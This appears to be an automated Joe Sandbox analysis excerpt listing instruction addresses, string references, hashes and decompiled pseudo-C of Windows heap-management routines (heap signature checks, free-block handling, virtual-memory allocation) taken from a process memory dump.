0x03728339
0x0372833c
0x036d404f
0x036d404f
0x036d404f
0x036d4051
0x036d4056
0x036d4063
0x036d4063
0x036d4068
0x00000000
0x036d4068
0x036d3fdf
0x036d3fe2
0x036d3fe4
0x036d3fe7
0x036d3fef
0x036d4003
0x036d4005
0x036d4005
0x036d400c
0x036d4013
0x036d4016
0x036d4017
0x036d401b
0x036d401e
0x00000000
0x036d401e
0x036d3fb6
0x036d3eb1
0x036d3eb4
0x036d3eb7
0x036d3ebc
0x037282a9
0x037282ab
0x036d3ec2
0x036d3ed3
0x036d3ed5
0x036d3ed8
0x036d3ed8
0x036d3edd
0x037282b3
0x037282b6
0x00000000
0x036d3ee3
0x036d3ee8
0x036d3eed
0x036d3ef0
0x036d3ef3
0x036d3f02
0x036d3f05
0x036d3f08
0x037282c0
0x037282c3
0x037282c5
0x037282c8
0x037282d0
0x037282e4
0x037282e6
0x037282e6
0x037282ed
0x037282f4
0x037282f7
0x037282f8
0x037282fc
0x037282ff
0x037282ff
0x036d3f0e
0x036d3f11
0x036d3f16
0x036d3f1d
0x036d3f31
0x03728307
0x03728307
0x036d3f31
0x036d3f39
0x036d3f48
0x036d3f4d
0x036d3f50
0x036d3f50
0x036d3f53
0x036d3f58
0x036d3f65
0x036d3f65
0x036d3f6a
0x00000000
0x036d3f6a
0x036d3edd
0x036d3dda
0x036d3ddd
0x036d3de0
0x036d3de5
0x03728245
0x036d3deb
0x036d3df7
0x036d3dfc
0x036d3dfe
0x036d3e01
0x036d3e01
0x036d3e06
0x0372824d
0x0372824f
0x03728254
0x00000000
0x036d3e0c
0x036d3e11
0x036d3e16
0x036d3e19
0x036d3e29
0x036d3e2c
0x036d3e2f
0x0372825c
0x0372825f
0x03728261
0x03728264
0x0372826c
0x03728280
0x03728282
0x03728282
0x03728289
0x03728290
0x03728293
0x03728294
0x03728298
0x0372829b
0x0372829b
0x036d3e35
0x036d3e38
0x036d3e3d
0x036d3e44
0x036d3e58
0x037282a3
0x037282a3
0x036d3e58
0x036d3e60
0x036d3e6f
0x036d3e74
0x036d3e77
0x036d3e77
0x036d3e7a
0x036d3e7f
0x036d3e8c
0x036d3e8c
0x036d3e91
0x00000000
0x036d3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 036D3DC0
Kernel-MUI-Language-SKU, xrefs: 036D3F70
Kernel-MUI-Number-Allowed, xrefs: 036D3D8C
WindowsExcludedProcs, xrefs: 036D3D6F
Kernel-MUI-Language-Disallowed, xrefs: 036D3E97

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7a506f81fc3f58db401c0d0f7ef578a13ced8657f1794b9e7fe3a03e0470e7c8
Instruction ID: d8d006f505d23e7e7e8af143b182d7319ffa3062ed563e678b144b141c74be2d
Opcode Fuzzy Hash: 7a506f81fc3f58db401c0d0f7ef578a13ced8657f1794b9e7fe3a03e0470e7c8
Instruction Fuzzy Hash: FCF14C76D01618EFCB12DF99D980AEEBBF9FF08650F15006AE505AB350DB719E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 036C40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E036C40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E036CB150(", passed to %s", _t29);
					}
					_push("\n");
					E036CB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x37b6378 = 1;
						asm("int3");
						 *0x37b6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x036c40e6
0x036c40e8
0x036c40f1
0x0372042d
0x0372044c
0x03720451
0x0372042f
0x03720444
0x03720449
0x0372045d
0x03720466
0x0372046e
0x03720474
0x03720475
0x0372047a
0x0372048a
0x0372048c
0x03720493
0x03720494
0x03720494
0x00000000
0x0372049b
0x00000000

Strings

RtlAllocateHeap, xrefs: 03720468
HEAP: , xrefs: 0372044C
Invalid heap signature for heap at %p, xrefs: 03720458
HEAP[%wZ]: , xrefs: 0372043F
, passed to %s, xrefs: 03720469

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 353bf60976df6a8fbedd364ad5f1acc08fd2abcd9354e459dc8c06a6d472c629
Instruction ID: 50e04b9e9071b510f3872af2409dc9781beedc0c16bce21d67348ece8d4d88ee
Opcode Fuzzy Hash: 353bf60976df6a8fbedd364ad5f1acc08fd2abcd9354e459dc8c06a6d472c629
Instruction Fuzzy Hash: BC0128363106909ED215D768E40EFA6BFB8DB02B30F1CC06DF0164BA81CAA49844C638

Uniqueness

Uniqueness Score: -1.00%

Function 036EA830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E036EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x37b8748 - 1;
					if( *0x37b8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E036CB150();
									_t260 = _t257 + 4;
								} else {
									E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E036CB150();
								_t257 = _t260 + 4;
								__eflags =  *0x37b7bc8;
								if(__eflags == 0) {
									E03782073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0378A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0371D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E036EAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0378A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0378A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x37b8748 - 1;
					if( *0x37b8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E036CB150();
							} else {
								E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E036CB150();
							__eflags =  *0x37b7bc8;
							if(__eflags == 0) {
								_t131 = E03782073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x036ea83a
0x036ea83c
0x036ea83e
0x036ea841
0x036ea844
0x036ea84a
0x036eaa53
0x036eaa59
0x036eaa59
0x036ea858
0x036ea85e
0x036eaaf5
0x036eaafc
0x0373229e
0x037322a2
0x037322a8
0x037322b3
0x037322b5
0x037322bb
0x037322c1
0x037322c5
0x037322e6
0x037322eb
0x037322f0
0x037322c7
0x037322dc
0x037322e1
0x037322e1
0x037322f3
0x037322f8
0x037322fd
0x03732300
0x03732307
0x0373230e
0x0373230e
0x03732313
0x03732313
0x037322b5
0x037322a2
0x036eaafc
0x036ea864
0x036ea869
0x036eaa5c
0x036eaa5e
0x036ea86f
0x036ea87f
0x036ea885
0x036ea885
0x036ea88b
0x036ea890
0x036ea896
0x036eab0c
0x036eab0f
0x036eab15
0x03732320
0x03732320
0x036eab1b
0x036ea89c
0x036ea89f
0x036ea8a2
0x036ea8a2
0x036ea8a5
0x036ea8af
0x036ea8b3
0x036ea8b8
0x036eaa66
0x036ea8be
0x036ea8c5
0x036ea8c6
0x036ea8ce
0x03732328
0x03732332
0x03732337
0x03732337
0x036ea8ce
0x036ea8d4
0x036ea8d8
0x036ea8db
0x036ea8de
0x036ea8e1
0x036ea8e5
0x036ea8e8
0x036ea8f0
0x036ea8f3
0x0373234c
0x03732350
0x03732355
0x03732359
0x03732359
0x036ea8f9
0x036ea901
0x036eaae4
0x036eaae4
0x036eaaea
0x00000000
0x036ea907
0x036ea90a
0x036ea91d
0x036ea91d
0x00000000
0x036ea910
0x036ea910
0x036ea910
0x036ea914
0x036ea924
0x036ea924
0x036ea924
0x036ea924
0x036ea916
0x036ea91b
0x00000000
0x00000000
0x00000000
0x036ea91b
0x036ea925
0x036ea925
0x036ea932
0x036ea936
0x036ea93c
0x036ea93c
0x036ea93c
0x036eab22
0x036eab24
0x036eab27
0x036eab27
0x036ea942
0x036ea944
0x036eaaba
0x036eaabd
0x036eaac0
0x036eaac0
0x036eaac2
0x036eab2f
0x036eaac4
0x036eaac4
0x036eaac7
0x036eaaca
0x036eaacc
0x036eaace
0x036eaace
0x036eaace
0x036eaad1
0x036eaad1
0x036eaad7
0x036eaad9
0x00000000
0x00000000
0x03732361
0x03732369
0x0373236b
0x00000000
0x03732371
0x00000000
0x03732371
0x00000000
0x0373236b
0x036eaac0
0x036ea94a
0x036ea94a
0x036ea94d
0x036ea94d
0x036ea950
0x036ea954
0x03732376
0x03732380
0x036ea95a
0x036ea95a
0x036ea95c
0x036ea95f
0x036ea961
0x036ea961
0x036ea967
0x036ea96a
0x036ea972
0x036eaa02
0x036eaa06
0x036eaa10
0x036eaa16
0x036eaa16
0x036eaa1b
0x036eaa21
0x036eaa24
0x036eaa27
0x036eaa29
0x036eaa2c
0x036eaa32
0x00000000
0x00000000
0x00000000
0x00000000
0x036ea978
0x036ea978
0x036ea97b
0x036ea981
0x036ea996
0x036ea998
0x036ea99f
0x036ea9a2
0x0373238a
0x036ea9a8
0x036ea9a8
0x036ea9a8
0x036ea9aa
0x036ea9ad
0x036ea9b0
0x036ea9bb
0x036ea9be
0x036ea9c7
0x036ea9c9
0x036ea9c9
0x036ea9cc
0x036ea9d1
0x036eaa6d
0x036eaa70
0x036eaa73
0x036eaa75
0x036eaa79
0x036eaa7e
0x036eaa82
0x036eaa8f
0x036eaa94
0x036eaa96
0x03732392
0x037323a1
0x037323a1
0x036eaa9c
0x036eaa9f
0x036eaaa2
0x036eaaa2
0x036eaaa8
0x036eaaab
0x036eaaaf
0x00000000
0x036eaab5
0x00000000
0x036eaab5
0x036ea9d7
0x036ea9d7
0x036ea9da
0x036ea9e0
0x036ea9e3
0x036ea9e6
0x036ea9e9
0x036ea9eb
0x036ea9fd
0x036ea9fd
0x00000000
0x036ea9eb
0x00000000
0x00000000
0x00000000
0x036ea983
0x036ea983
0x036ea983
0x036ea987
0x036ea995
0x036ea995
0x036ea995
0x036ea995
0x036ea989
0x036ea98e
0x00000000
0x036ea990
0x00000000
0x036ea990
0x036ea98e
0x00000000
0x036ea983
0x036ea972
0x036ea90a
0x036eaa34
0x036eaa34
0x036eaa40
0x036eaa43
0x036eaa46
0x036eaa4d
0x037323ab
0x037323b2
0x037323b8
0x037323be
0x037323c3
0x037323c5
0x037323cb
0x037323d1
0x037323d5
0x037323f6
0x037323fb
0x037323d7
0x037323ec
0x037323f1
0x03732403
0x03732408
0x03732410
0x03732417
0x03732422
0x03732422
0x03732417
0x037323c5
0x037323b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03732403
HEAP: , xrefs: 037322E6, 037323F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 037322F3
HEAP[%wZ]: , xrefs: 037322D7, 037323E7

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 4ffcc236c97f74915fb5e689a7b32172dd9f18fba18d01b7f102faed0c5aae14
Instruction ID: 79e45637390b5c8fc4eceb2f78f26a9d8327749677d184f5c30d2ec2170f35ce
Opcode Fuzzy Hash: 4ffcc236c97f74915fb5e689a7b32172dd9f18fba18d01b7f102faed0c5aae14
Instruction Fuzzy Hash: 47D1DF34A112459FDB18CFA8C590BBAB7F5FF48300F1985ADD85A9B742E370E849CB61

Uniqueness

Uniqueness Score: -1.00%

Function 036EA229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E036EA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E036EDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03709730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0378A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03709660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E036CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E036E7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0378138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E036E7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E036E7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E03781582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E036E7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E036E7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E03781582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0371D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x036ea229
0x036ea231
0x036ea23f
0x036ea242
0x036ea244
0x036ea24c
0x036ea255
0x036ea25a
0x036ea25f
0x03731c76
0x03731c78
0x03731c7e
0x03731c7f
0x03731c81
0x03731c82
0x03731c84
0x03731c89
0x03731c8b
0x03731c9e
0x03731c9e
0x03731cab
0x03731cb2
0x00000000
0x03731cb2
0x03731c8d
0x03731c92
0x00000000
0x00000000
0x03731c94
0x03731c98
0x00000000
0x00000000
0x00000000
0x03731c98
0x036ea265
0x036ea265
0x036ea266
0x036ea26f
0x036ea270
0x036ea276
0x036ea277
0x036ea279
0x036ea27e
0x036ea282
0x03731db5
0x03731dbb
0x03731dc1
0x03731dc5
0x03731de4
0x03731de9
0x03731dc7
0x03731ddc
0x03731de1
0x03731def
0x03731df3
0x03731df7
0x03731dfe
0x03731e06
0x036ea302
0x036ea308
0x036ea308
0x036ea288
0x036ea28d
0x036ea294
0x03731cc1
0x036ea29a
0x036ea29a
0x036ea29a
0x036ea29f
0x03731ccb
0x03731cd1
0x03731cd8
0x03731cea
0x03731cea
0x03731cd8
0x036ea2a9
0x036ea2af
0x036ea2bc
0x03731cfd
0x036ea2c2
0x036ea2c2
0x036ea2c2
0x036ea2c7
0x03731d07
0x03731d0d
0x03731d14
0x03731d1f
0x03731d21
0x03731d2c
0x03731d2c
0x03731d2c
0x03731d47
0x03731d47
0x03731d14
0x036ea2cd
0x036ea2d2
0x036ea2d9
0x03731d5a
0x036ea2df
0x036ea2df
0x036ea2df
0x036ea2e4
0x03731d69
0x03731d6b
0x03731d76
0x03731d76
0x03731d76
0x03731d91
0x03731d91
0x036ea2ea
0x036ea2f0
0x036ea2f5
0x03731da8
0x03731dad
0x03731dad
0x036ea2fd
0x036ea300
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03731DF9
HEAP: , xrefs: 03731DE4
HEAP[%wZ]: , xrefs: 03731DD7
`, xrefs: 03731C8D

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

